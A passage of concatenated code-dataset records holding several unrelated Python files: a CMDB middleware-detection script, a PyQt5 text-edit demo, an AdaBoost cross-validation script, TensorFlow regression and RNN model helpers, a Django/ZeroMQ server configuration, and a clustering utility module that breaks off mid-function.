zookeeper\",\"regex\":\"(\\\\S+)/bin/../conf/zoo.cfg\"},\n\t{\"softwareName\":\"Nginx\",\"softwareType\":\"MiddleWare\",\"existCmd\":\"ps -ef|grep nginx\",\"exitKeyword\":\"sbin/nginx\",\"installCmd\":\"ps -ef|grep nginx\",\"regex\":\"(\\\\S+)/sbin/nginx\"},\n\t{\"softwareName\":\"Redis\",\"softwareType\":\"DataBase\",\"existCmd\":\"ps -ef|grep redis\",\"exitKeyword\":\"redis-server\",\"installCmd\":\"ps -ef|grep redis\",\"regex\":\"(\\\\S+)/bin/redis-server\"},\n\t{\"softwareName\":\"Jboss\",\"softwareType\":\"MiddleWare\",\"existCmd\":\" ps -ef|grep jboss\",\"exitKeyword\":\"-Djboss\",\"installCmd\":\"ps -ef|grep jboss\",\"regex\":\"-Djboss.home.dir=(\\\\S+)\"}\n]\n softwareVec = []\n for item in filejson:\n state, result = commands.getstatusoutput(item['existCmd'])\n if item['exitKeyword'] in result:\n #print(item['exitKeyword'])\n state1, result1 = commands.getstatusoutput(item['installCmd'])\n search = re.search(item['regex'], result1)\n if search:\n path = search.group(1)\n dic =dict()\n dic['software_name'] = item['softwareName']\n dic['software_type'] = item['softwareType']\n dic['install_path'] = path\n dic['user'],dic['group'] = get_user(path)\n #dic['group'] = get_user(path)[1]\n dic['soft_hostIP'] = host_ip\n softwareVec.append(dic)\n else:\n continue\n return softwareVec\n #output['CIT_AppSoft'] = softwareVec\n\n\nclass Software:\n def __init__(self, host_ip):\n self.soft_hostIP = host_ip # By which ip you access to this host;\n self.software_name = \"\"\n self.software_type = \"\"\n self.install_path = \"\"\n self.user = \"\"\n self.group = \"\"\n\n def to_dict(self):\n return self.__dict__\n\n def get_install_path_oracle(self):\n state, result =executeCmdByShell(\"ps -ef|grep oracle|grep tnslsnr\")\n if \"sh\" in result:\n res1=result.split('\\n')[0]\n if \"sh\" in res1:\n result=result.split('\\n')[1]\n else:\n result=result.split('\\n')[0]\n vecs=result.split()\n for vec in vecs:\n if \"/\" in vec:\n result=vec\n break\n\n b = result.find('bin')\n c = result[:b]\n return c\n\n","sub_path":"zhujiziyuan/CMDB_UNIX/Software_module.py","file_name":"Software_module.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"246861573","text":"\nimport sys\nimport os\n\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTextEdit, QGridLayout\n\n\nclass Window(QWidget):\n \n def __init__(self):\n \n super().__init__()\n self.initUi()\n \n self.show()\n \n \n def initUi(self):\n\n layout = QGridLayout() \n text_edit = QTextEdit()\n\n html = '''\n
This line is red
\n
This line is 14px
\n
This line is bold
\n
\n\n \n \n \n
MonthSavings
January$100
February$80
\n'''\n\n text_edit.setHtml(html)\n\n layout.addWidget(text_edit, 0, 0)\n self.setLayout(layout)\n\n\n\ndef main(args):\n \n app = QApplication(args)\n window = Window()\n sys.exit(app.exec_())\n \n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"PyQt5-Examples/07_input_widgets/text_edit.py","file_name":"text_edit.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"300005745","text":"from __future__ import print_function\nimport sys\n\nimport numpy as np\n\nfrom models.DecisionTree import DecisionTree\nfrom models.Adaboost import Adaboost\nimport io.importer as importer\n\n# preprocessing to construct folding of dataset\ndef construct_k_folds(data, folds=10):\n\n num_rows = data.shape[0]\n fold_length = int(num_rows/folds)\n fold_list = []\n for i in range(folds):\n fold_list.append(data[np.random.choice(num_rows, fold_length, replace=False),:])\n return fold_list\n\n\ndef myABoost(filename, B, k):\n\n filename = str(filename)\n B = B.split(',')\n for b in range(len(B)):\n B[b] = int(B[b])\n k = int(k)\n\n datas = importer.load_and_classify(loc=filename)\n\n # iterate through datasets (Boston50 and Boston75)\n for d in range(len(datas)):\n data = datas[d]\n if d == 0:\n data_name = \"Boston50\"\n else:\n data_name = \"Boston75\"\n fold_list = construct_k_folds(data, folds=k)\n\n # iterate through folds and keep track of errors\n error_matrix = np.zeros(shape=(2*k+4,len(B)))\n\n # iterate through the possible cases of base classifier size\n for b in range(len(B)):\n total_test_error = 0.0\n total_train_error = 0.0\n # construct folded dataset\n for i in range(0,2*len(fold_list), 2):\n test = fold_list[i/2]\n X = np.empty(shape=((k-1)*test.shape[0], test.shape[1]))\n x_row = 0\n for j in range(len(fold_list)):\n if j == i/2:\n continue\n else:\n num_rows = fold_list[j].shape[0]\n X[x_row:x_row + num_rows,:] = fold_list[j]\n x_row = x_row + num_rows\n\n # create new Adaboost object that tracks weak learners and their alphas\n # and computes weight distribution from error calculation\n AB = Adaboost(X, B[b])\n weights = AB.weights\n # create B[b] weak learners and add them to the model, training on\n # previous weak learner's derived weight update\n for t in range(B[b]):\n DT = DecisionTree()\n dt = DT.compute_weighted_subtree(X, w=weights)\n weights = AB.add_model(dt)\n\n # consensus vote given B[b] weak learners on the dataset fold for the training set\n x_hat = AB.vote(X)\n # consensus vote given B[b] weak learners on the dataset fold for the test set\n y_hat = AB.vote(test)\n # compute means\n test_error = float(np.sum(np.absolute(y_hat - test[:, test.shape[1]-1])))/float(test.shape[0])\n train_error = float(np.sum(np.absolute(x_hat - X[:,X.shape[1]-1])))/float(X.shape[0])\n error_matrix[i,b] = train_error\n error_matrix[i+1,b] = test_error\n\n print(\"Adaboost Results for B = \" + str(B[b]))\n print(\"TRAIN ERROR: \", train_error)\n print(\"TEST ERROR: \", test_error)\n\n total_test_error = total_test_error + test_error\n total_train_error = total_train_error + train_error\n\n print(data_name)\n print(\"Total Test Error: \", total_test_error/float(k))\n print(\"Total Train Error: \", total_train_error/float(k))\n\n # find standard deviation and mean, add to calculated matrix\n for c in range(error_matrix.shape[1]):\n test = np.empty(shape=(k))\n train = np.empty(shape=(k))\n for r in range(error_matrix.shape[0]-4):\n if r % 2 == 0:\n train[r/2] = error_matrix[r,c]\n else:\n test[(r-1)/2] = error_matrix[r,c]\n error_matrix[error_matrix.shape[0]-4, c] = np.mean(train)\n error_matrix[error_matrix.shape[0]-3, c] = np.std(train)\n error_matrix[error_matrix.shape[0]-2, c] = np.mean(test)\n error_matrix[error_matrix.shape[0]-1, c] = np.std(test)\n\n np.savetxt(\"./data/processed/adaboost_error_matrix_\"+data_name+\".csv\",error_matrix, delimiter=',')\n\n\n\nif __name__ == \"__main__\":\n myABoost(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"HW3/csci5525hw3/myABoost.py","file_name":"myABoost.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"593668807","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Various high level TF models.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\n\nfrom tensorflow.contrib import rnn as contrib_rnn\nfrom tensorflow.contrib.learn.python.learn.ops import losses_ops\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops as array_ops_\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import variable_scope as vs\nfrom tensorflow.python.summary import summary\n\n\ndef linear_regression_zero_init(x, y):\n \"\"\"Linear regression subgraph with zero-value initial weights and bias.\n\n Args:\n x: tensor or placeholder for input features.\n y: tensor or placeholder for labels.\n\n Returns:\n Predictions and loss tensors.\n \"\"\"\n return linear_regression(x, y, init_mean=0.0, init_stddev=0.0)\n\n\ndef logistic_regression_zero_init(x, y):\n \"\"\"Logistic regression subgraph with zero-value initial weights and bias.\n\n Args:\n x: tensor or placeholder for input features.\n y: tensor or placeholder for labels.\n\n Returns:\n Predictions and loss tensors.\n \"\"\"\n return logistic_regression(x, y, init_mean=0.0, init_stddev=0.0)\n\n\ndef linear_regression(x, y, init_mean=None, init_stddev=1.0):\n \"\"\"Creates linear regression TensorFlow subgraph.\n\n Args:\n x: tensor or placeholder for input features.\n y: tensor or placeholder for labels.\n init_mean: the mean value to use for initialization.\n init_stddev: the standard devation to use for initialization.\n\n Returns:\n Predictions and loss tensors.\n\n Side effects:\n The variables linear_regression.weights and linear_regression.bias are\n initialized as follows. If init_mean is not None, then initialization\n will be done using a random normal initializer with the given init_mean\n and init_stddv. (These may be set to 0.0 each if a zero initialization\n is desirable for convex use cases.) If init_mean is None, then the\n uniform_unit_scaling_initialzer will be used.\n \"\"\"\n with vs.variable_scope('linear_regression'):\n scope_name = vs.get_variable_scope().name\n summary.histogram('%s.x' % scope_name, x)\n summary.histogram('%s.y' % scope_name, y)\n dtype = x.dtype.base_dtype\n y_shape = y.get_shape()\n if len(y_shape) == 1:\n output_shape = 1\n else:\n output_shape = y_shape[1]\n # Set up the requested initialization.\n if init_mean is None:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], output_shape], dtype=dtype)\n bias = vs.get_variable('bias', [output_shape], dtype=dtype)\n else:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], output_shape],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n bias = vs.get_variable(\n 'bias', [output_shape],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n summary.histogram('%s.weights' % scope_name, weights)\n summary.histogram('%s.bias' % scope_name, bias)\n return losses_ops.mean_squared_error_regressor(x, y, weights, bias)\n\n\ndef logistic_regression(x,\n y,\n class_weight=None,\n init_mean=None,\n init_stddev=1.0):\n \"\"\"Creates logistic regression TensorFlow subgraph.\n\n Args:\n x: tensor or placeholder for input features,\n shape should be [batch_size, n_features].\n y: tensor or placeholder for labels (one-hot),\n shape should be [batch_size, n_classes].\n class_weight: tensor, [n_classes], where for each class\n it has weight of the class. If not provided\n will check if graph contains tensor `class_weight:0`.\n If that is not provided either all ones are used.\n init_mean: the mean value to use for initialization.\n init_stddev: the standard devation to use for initialization.\n\n Returns:\n Predictions and loss tensors.\n\n Side effects:\n The variables linear_regression.weights and linear_regression.bias are\n initialized as follows. If init_mean is not None, then initialization\n will be done using a random normal initializer with the given init_mean\n and init_stddv. (These may be set to 0.0 each if a zero initialization\n is desirable for convex use cases.) If init_mean is None, then the\n uniform_unit_scaling_initialzer will be used.\n \"\"\"\n with vs.variable_scope('logistic_regression'):\n scope_name = vs.get_variable_scope().name\n summary.histogram('%s.x' % scope_name, x)\n summary.histogram('%s.y' % scope_name, y)\n dtype = x.dtype.base_dtype\n # Set up the requested initialization.\n if init_mean is None:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], y.get_shape()[-1]], dtype=dtype)\n bias = vs.get_variable('bias', [y.get_shape()[-1]], dtype=dtype)\n else:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], y.get_shape()[-1]],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n bias = vs.get_variable(\n 'bias', [y.get_shape()[-1]],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n summary.histogram('%s.weights' % scope_name, weights)\n summary.histogram('%s.bias' % scope_name, bias)\n # If no class weight provided, try to retrieve one from pre-defined\n # tensor name in the graph.\n if not class_weight:\n try:\n class_weight = ops.get_default_graph().get_tensor_by_name(\n 'class_weight:0')\n except KeyError:\n pass\n\n return losses_ops.softmax_classifier(\n x, y, weights, bias, class_weight=class_weight)\n\n\n## This will be in TensorFlow 0.7.\n## TODO(ilblackdragon): Clean this up when it's released\ndef _reverse_seq(input_seq, lengths):\n \"\"\"Reverse a list of Tensors up to specified lengths.\n\n Args:\n input_seq: Sequence of seq_len tensors of dimension (batch_size, depth)\n lengths: A tensor of dimension batch_size, containing lengths for each\n sequence in the batch. If \"None\" is specified, simply\n reverses the list.\n\n Returns:\n time-reversed sequence\n \"\"\"\n if lengths is None:\n return list(reversed(input_seq))\n\n for input_ in input_seq:\n input_.set_shape(input_.get_shape().with_rank(2))\n\n # Join into (time, batch_size, depth)\n s_joined = array_ops_.pack(input_seq)\n\n # Reverse along dimension 0\n s_reversed = array_ops_.reverse_sequence(s_joined, lengths, 0, 1)\n # Split again into list\n result = array_ops_.unpack(s_reversed)\n return result\n\n\ndef bidirectional_rnn(cell_fw,\n cell_bw,\n inputs,\n initial_state_fw=None,\n initial_state_bw=None,\n dtype=None,\n sequence_length=None,\n scope=None):\n \"\"\"Creates a bidirectional recurrent neural network.\n\n Similar to the unidirectional case (rnn) but takes input and builds\n independent forward and backward RNNs with the final forward and backward\n outputs depth-concatenated, such that the output will have the format\n [time][batch][cell_fw.output_size + cell_bw.output_size]. The input_size of\n forward and backward cell must match. The initial state for both directions\n is zero by default (but can be set optionally) and no intermediate states\n are ever returned -- the network is fully unrolled for the given (passed in)\n length(s) of the sequence(s) or completely unrolled if length(s) is not\n given.\n Args:\n cell_fw: An instance of RNNCell, to be used for forward direction.\n cell_bw: An instance of RNNCell, to be used for backward direction.\n inputs: A length T list of inputs, each a tensor of shape\n [batch_size, cell.input_size].\n initial_state_fw: (optional) An initial state for the forward RNN.\n This must be a tensor of appropriate type and shape\n [batch_size x cell.state_size].\n initial_state_bw: (optional) Same as for initial_state_fw.\n dtype: (optional) The data type for the initial state. Required if\n either of the initial states are not provided.\n sequence_length: (optional) An int64 vector (tensor) of size\n [batch_size],\n containing the actual lengths for each of the sequences.\n scope: VariableScope for the created subgraph; defaults to \"BiRNN\"\n\n Returns:\n A pair (outputs, state) where:\n outputs is a length T list of outputs (one for each input), which\n are depth-concatenated forward and backward outputs\n state is the concatenated final state of the forward and backward RNN\n\n Raises:\n TypeError: If \"cell_fw\" or \"cell_bw\" is not an instance of RNNCell.\n ValueError: If inputs is None or an empty list.\n \"\"\"\n\n if not isinstance(cell_fw, contrib_rnn.RNNCell):\n raise TypeError('cell_fw must be an instance of RNNCell')\n if not isinstance(cell_bw, contrib_rnn.RNNCell):\n raise TypeError('cell_bw must be an instance of RNNCell')\n if not isinstance(inputs, list):\n raise TypeError('inputs must be a list')\n if not inputs:\n raise ValueError('inputs must not be empty')\n\n name = scope or 'BiRNN'\n # Forward direction\n with vs.variable_scope(name + '_FW'):\n output_fw, state_fw = contrib_rnn.static_rnn(cell_fw, inputs,\n initial_state_fw, dtype,\n sequence_length)\n\n # Backward direction\n with vs.variable_scope(name + '_BW'):\n tmp, state_bw = contrib_rnn.static_rnn(\n cell_bw,\n _reverse_seq(inputs, sequence_length), initial_state_bw, dtype,\n sequence_length)\n output_bw = _reverse_seq(tmp, sequence_length)\n # Concat each of the forward/backward outputs\n outputs = [\n array_ops_.concat([fw, bw], 1) for fw, bw in zip(output_fw, output_bw)\n ]\n\n return outputs, array_ops_.concat([state_fw, state_bw], 1)\n\n\n# End of TensorFlow 0.7\n\n\ndef get_rnn_model(rnn_size, cell_type, num_layers, input_op_fn, bidirectional,\n target_predictor_fn, sequence_length, initial_state,\n attn_length, attn_size, attn_vec_size):\n \"\"\"Returns a function that creates a RNN TensorFlow subgraph.\n\n Args:\n rnn_size: The size for rnn cell, e.g. size of your word embeddings.\n cell_type: The type of rnn cell, including rnn, gru, and lstm.\n num_layers: The number of layers of the rnn model.\n input_op_fn: Function that will transform the input tensor, such as\n creating word embeddings, byte list, etc. This takes\n an argument `x` for input and returns transformed `x`.\n bidirectional: boolean, Whether this is a bidirectional rnn.\n target_predictor_fn: Function that will predict target from input\n features. This can be logistic regression,\n linear regression or any other model,\n that takes `x`, `y` and returns predictions and loss\n tensors.\n sequence_length: If sequence_length is provided, dynamic calculation is\n performed. This saves computational time when unrolling past max sequence\n length. Required for bidirectional RNNs.\n initial_state: An initial state for the RNN. This must be a tensor of\n appropriate type and shape [batch_size x cell.state_size].\n attn_length: integer, the size of attention vector attached to rnn cells.\n attn_size: integer, the size of an attention window attached to rnn cells.\n attn_vec_size: integer, the number of convolutional features calculated on\n attention state and the size of the hidden layer built from base cell\n state.\n\n Returns:\n A function that creates the subgraph.\n \"\"\"\n\n def rnn_estimator(x, y):\n \"\"\"RNN estimator with target predictor function on top.\"\"\"\n x = input_op_fn(x)\n if cell_type == 'rnn':\n cell_fn = contrib_rnn.BasicRNNCell\n elif cell_type == 'gru':\n cell_fn = contrib_rnn.GRUCell\n elif cell_type == 'lstm':\n cell_fn = functools.partial(\n contrib_rnn.BasicLSTMCell, state_is_tuple=False)\n else:\n raise ValueError('cell_type {} is not supported. '.format(cell_type))\n # TODO(ipolosukhin): state_is_tuple=False is deprecated\n if bidirectional:\n # forward direction cell\n fw_cell = lambda: cell_fn(rnn_size)\n bw_cell = lambda: cell_fn(rnn_size)\n # attach attention cells if specified\n if attn_length is not None:\n def attn_fw_cell():\n return contrib_rnn.AttentionCellWrapper(\n fw_cell(),\n attn_length=attn_length,\n attn_size=attn_size,\n attn_vec_size=attn_vec_size,\n state_is_tuple=False)\n\n def attn_bw_cell():\n return contrib_rnn.AttentionCellWrapper(\n bw_cell(),\n attn_length=attn_length,\n attn_size=attn_size,\n attn_vec_size=attn_vec_size,\n state_is_tuple=False)\n else:\n attn_fw_cell = fw_cell\n attn_bw_cell = bw_cell\n\n rnn_fw_cell = contrib_rnn.MultiRNNCell(\n [attn_fw_cell() for _ in range(num_layers)], state_is_tuple=False)\n # backward direction cell\n rnn_bw_cell = contrib_rnn.MultiRNNCell(\n [attn_bw_cell() for _ in range(num_layers)], state_is_tuple=False)\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n _, encoding = bidirectional_rnn(\n rnn_fw_cell,\n rnn_bw_cell,\n x,\n dtype=dtypes.float32,\n sequence_length=sequence_length,\n initial_state_fw=initial_state,\n initial_state_bw=initial_state)\n else:\n rnn_cell = lambda: cell_fn(rnn_size)\n\n if attn_length is not None:\n def attn_rnn_cell():\n return contrib_rnn.AttentionCellWrapper(\n rnn_cell(),\n attn_length=attn_length,\n attn_size=attn_size,\n attn_vec_size=attn_vec_size,\n state_is_tuple=False)\n else:\n attn_rnn_cell = rnn_cell\n\n cell = contrib_rnn.MultiRNNCell(\n [attn_rnn_cell() for _ in range(num_layers)], state_is_tuple=False)\n _, encoding = contrib_rnn.static_rnn(\n cell,\n x,\n dtype=dtypes.float32,\n sequence_length=sequence_length,\n initial_state=initial_state)\n return target_predictor_fn(encoding, y)\n\n return rnn_estimator\n","sub_path":"Tensorflow_OpenCV_Nightly/source/tensorflow/contrib/learn/python/learn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"109975139","text":"#coding=utf-8\r\nDjangoDatabaseSettings = {\r\n 'default': {\r\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\r\n 'NAME': 'foxter', # Or path to database file if using sqlite3.\r\n 'USER': 'foxter', # Not used with sqlite3.\r\n 'PASSWORD': 'karamba', # Not used with sqlite3.\r\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\r\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\r\n 'OPTIONS':{ 'init_command': 'SET storage_engine=INNODB, SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED'}\r\n }\r\n}\r\n\r\nRUNTYPE_PRODUCTION = False\r\nLOG_TO_FILES = True\r\n\r\n#Адрес и порт управления сервером\r\nSERV_CONTROL_ADDR = ('127.0.0.1', 8888)\r\n\r\n#список фронтэнд процессов \r\nFrontendList = [\r\n { 'Name':'FR1', 'WebPort': 8001 } , #WebPort - порт для приема Socket.IO подключений\r\n { 'Name':'FR2', 'WebPort': 8002 } , #При использовании нескольких фронтэндов или нестандартного порта \r\n# { 'Name':'FR3', 'WebPort': 8003 } , #нужно перед фронтэндом запускать TCP-прокси сервер типа haProxy \r\n# { 'Name':'FR4', 'WebPort': 8004 } , #нужно перед фронтэндом запускать TCP-прокси сервер типа haProxy\r\n# { 'Name':'FR5', 'WebPort': 8005 } , #нужно перед фронтэндом запускать TCP-прокси сервер типа haProxy\r\n# { 'Name':'FR6', 'WebPort': 8006 } , #нужно перед фронтэндом запускать TCP-прокси сервер типа haProxy\r\n# { 'Name':'FR7', 'WebPort': 8007 } , #WebPort - порт для приема Socket.IO подключений\r\n# { 'Name':'FR8', 'WebPort': 8008 } , #При использовании нескольких фронтэндов или нестандартного порта \r\n]\r\n\r\n#список бэкенд процессов\r\n#ReqEndPoint - адрес ZeroMQ сокета для приема запросов (сокет типа PULL)\r\n#ReplyEndPoint - адрес ZeroMQ сокета дл�� отправки ответов (сокет типа ROUTER)\r\nBackendList = [\r\n { 'Name':'BE1', 'ReqEndPoint': 'tcp://127.0.0.1:10601' ,'ReplyEndPoint':'tcp://127.0.0.1:10701'} ,\r\n { 'Name':'BE2', 'ReqEndPoint': 'tcp://127.0.0.1:10602' ,'ReplyEndPoint':'tcp://127.0.0.1:10702'} ,\r\n# { 'Name':'BE3', 'ReqEndPoint': 'tcp://127.0.0.1:10603' ,'ReplyEndPoint':'tcp://127.0.0.1:10703'} ,\r\n# { 'Name':'BE4', 'ReqEndPoint': 'tcp://127.0.0.1:10604' ,'ReplyEndPoint':'tcp://127.0.0.1:10704'} , \r\n# { 'Name':'BE5', 'ReqEndPoint': 'tcp://127.0.0.1:10605' ,'ReplyEndPoint':'tcp://127.0.0.1:10705'} , \r\n# { 'Name':'BE6', 'ReqEndPoint': 'tcp://127.0.0.1:10606' ,'ReplyEndPoint':'tcp://127.0.0.1:10706'} , \r\n #{ 'Name':'BE7', 'ReqEndPoint': 'tcp://127.0.0.1:10607' ,'ReplyEndPoint':'tcp://127.0.0.1:10707'} , \r\n #{ 'Name':'BE8', 'ReqEndPoint': 'tcp://127.0.0.1:10608' ,'ReplyEndPoint':'tcp://127.0.0.1:10708'} , \r\n]\r\n\r\n#настройки memcached\r\nMemcachedSettings = {\r\n 'MultiServer': False,\r\n 'User': 'foxter', #пользователь от имени которого будет запущен memcached\r\n 'ExecPath': '/usr/bin/memcached',#'C:/temp/memcached.exe',# #путь исполняемого файла\r\n 'Servers': ['127.0.0.1:10801'] #список запускаемых серверов \r\n}\r\n\r\n#Настройки сервиса сбора статистики\r\nStatLogSettings = {\r\n 'Level': 'FULL',\r\n 'StatEndPoint': 'tcp://127.0.0.1:10901', #адрес ZeroMQ сокета для приема сообщений статистики\r\n}\r\n\r\n#настройки процесса фоновых задач\r\nSyncServiceSettings = {\r\n 'SyncEndPoint':'tcp://127.0.0.1:11001', #ZeroMQ сокет для сообщений от процесса\r\n 'SyncReqPoint':'tcp://127.0.0.1:11002', #ZeroMQ сокет для запросов процессу\r\n 'SyncInterval': 100, #ms #интервал выполнения периодической проверки\r\n}\r\n","sub_path":"config/globalsets.py","file_name":"globalsets.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"507328762","text":"'''\n----------------------------------------------------------------------------------------------------\nThis is a general utility function to perform various tasks for un-superwised ML\n----------------------------------------------------------------------------------------------------\nBy Huanwang Henry Yang (2019-06-12)\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans, MeanShift, estimate_bandwidth\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.datasets import load_digits, make_blobs\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\nfrom sklearn.metrics import silhouette_samples, silhouette_score\nfrom kmodes.kprototypes import KPrototypes\nfrom kmodes.kmodes import KModes\nimport scipy.cluster.hierarchy as sch\nimport matplotlib.cm as cm\nfrom tqdm import tqdm #provide visual bar\n\n#------------------------------------------------------------------------ \n#------------------------------------------------------------------------ \n#------------------------------------------------------------------------ \ndef cluster_mean_table(df_in, col_all, cluster_name='cluster') :\n '''cluster_mean_table(df_in, col_all, cluster_name='cluster')\n Generate a table for the average of all the given attributes. \n df_in: a DF \n col_all : the given column names to get the averaged values.\n '''\n \n df=df_in.copy()\n \n col= col_all + [cluster_name]\n df1=df[col].groupby([cluster_name]).mean().T #DF for all attributes\n df2=df[col_all].mean().to_frame('overall_mean') #Df for the avg of attributes\n df_12=pd.concat([df1, df2], axis=1) #merge by column\n \n # add a row for cluster_counts\n df3=df[cluster_name].value_counts().to_frame('cluster_counts').T \n df_w=pd.concat([df3, df_12], axis=0)\n df_w.loc['cluster_counts', 'overall_mean'] = df3.mean(axis=1)['cluster_counts']\n \n #calculate the ratio between the overall_mean and each cluster\n coln=df_w.drop(['overall_mean'], axis=1).columns\n d1=df_w.drop(coln, axis=1)\n d2=df_w[coln].div(df_w.overall_mean, axis=0)\n df_ratio=pd.concat([d2, d1], axis=1 )\n\n return df_ratio #, df_3\n\n#------------------------------------------------------------------------ \ndef add_cluster_2df(df_file, df_fit, kmean, npca=0):\n '''add_cluster_2df(df_file, kmean)\n df_file: a DF to which the clusters are put for details analysis. \n df_fit: is the DF for fitting KMeans. (only used here to print the score).\n kmean: is the KMeans model after fitting\n npca: add the number of component (npca) to the df_file for display (e.g. by Tableau)\n '''\n\n #IF PCA, create a DF for the PCA transformed data (add it to df_file for display only)\n if (npca>=2) : \n col_pca=['pca_comp_'+str(i+1) for i in range(npca) ]\n df_pca=pd.DataFrame(data=df_fit[:,0:npca], columns=col_pca)\n #print(df_pca.shape)\n \n y_km = kmean.labels_ #same as #y_km = km.fit_predict(df3)\n df_f=df_file.copy().reset_index(drop=True) # \n\n df_f['cluster'] = y_km +1 #put the predicted cluster into the DF\n\n if (npca>=2) : \n df_f=pd.concat([df_f, df_pca], axis=1)\n\n# reorder the clusters from large to small\n arg=list(df_f.cluster.value_counts().index) #original value\n rep=list(df_f.cluster.value_counts().sort_index().index) #reordered value\n repl=['cluster_' + str(i) for i in rep] #convert to string\n df_f.cluster.replace(arg, repl, inplace=True)\n\n# print('center of the cluster=\\n', km.cluster_centers_)\n print('Kmeans score= {:.2f}' .format(kmean.score(df_fit)))\n print('Cluster and observation\\n', df_f.cluster.value_counts().sort_index())\n \n return df_f\n\n\n#------------------------------------------------------------------------ \n\ndef cluster_var_selection(df_in, col=[], maxeigval=0.8):\n '''Select variable from each cluster based on PCA, eighen value, R_Sq ratio\n RS_ratio= 1- RS_Own_cluster / RS_Next_closest_Cluster\n Select one variable from each cluster which is having minimum RS_ratio.\n \n maxeigval: given 0.8\n maxeigval = 0.8. It means that clusters will split if the second eigenvalue \n is greater than 0.8. A larger value of this parameter gives fewer clusters \n and less of the variations explained. Smaller value gives more clusters and \n more variation explained. The common choice is 1 as it represents the average \n size of eigenvalues.\n '''\n from varclushi import VarClusHi\n\n df=df_in.select_dtypes(include='number') #must be num\n if len(col)>0: \n df=df_in[col]\n \n vmod=VarClusHi(df, maxeigval2=maxeigval, maxclus=None)\n vmod.varclus()\n dd=vmod.rsquare \n return dd\n\n#------------------------------------------------------------------------ \ndef kmean_test_init(X, n_clusters=3):\n '''Kmean depend on the initial allocation of centroid.\n test 5 different allocation of centroid, and pick the smaller score\n '''\n import random\n n_iter = 5\n score=[]\n for i in range(n_iter):\n # Run local implementation of kmeans\n random_num=random.randint(0, 1000)\n km = KMeans(n_clusters=n_clusters,random_state=random_num)\n \n km.fit(X)\n val=km.score(X)\n score.append(val)\n print(\"random_state=\", random_num, \"score=\", val)\n return score\n\n#------------------------------------------------------------------------ \ndef silhouette(X, n_clust):\n '''A function to determine the degree of separation between clusters.\n X: a np.array; n_clust: number of the given maximum clusters.\n \n1. Compute the average distance from all data points in the same cluster (ai).\n2. Compute the average distance from all data points in the closest cluster (bi).\n3. Compute the coefficient: (bi - ai)/max(ai,bi). Values in the interval [-1, 1]\n\nIf it is 0 –> the sample is very close to the neighboring clusters.\nIt it is 1 –> the sample is far away from the neighboring clusters (correct cluster).\nIt it is -1 –> the sample is assigned to the wrong clusters. \n\n--------------\nThe Yellowbrick in SKlearn is gives visual check.\n\nThe vertical red line is the average of the score. \nFor good clustering, it should satisfy the following conditions:\n1. The mortif (brick) should be above (pass) the average line. \n2. The tail on the left of each motif shows the overlap level with other motifs. \n The samller the tail is, the less overlap of the neighboring cluster.\n3. Ideally, the size of each motif is similar.\n\n '''\n\n X=np.array(X)\n sscore=[]\n for n_clusters in range(2, n_clust):\n # Create a subplot with 1 row and 2 columns\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.set_size_inches(12, 5)\n\n # The 1st subplot is the silhouette plot\n # The silhouette coefficient can range from -1, 1 but in this example all\n # lie within [-0.1, 1]\n ax1.set_xlim([-1, 1])\n \n # The (n_clusters+1)*10 is for inserting blank space between silhouette\n # plots of individual clusters, to demarcate them clearly.\n ax1.set_ylim([0, len(X) + (n_clusters + 1) * 10])\n\n # Initialize the clusterer with n_clusters value and a random generator\n # seed of 10 for reproducibility.\n clusterer = KMeans(n_clusters=n_clusters, random_state=10)\n cluster_labels = clusterer.fit_predict(X)\n\n # The silhouette_score gives the average value for all the samples.\n # This gives a perspective into the density and separation of the formed\n # clusters\n silhouette_avg = silhouette_score(X, cluster_labels)\n sscore.append(silhouette_avg)\n print(\"For n_clusters =\", n_clusters,\n 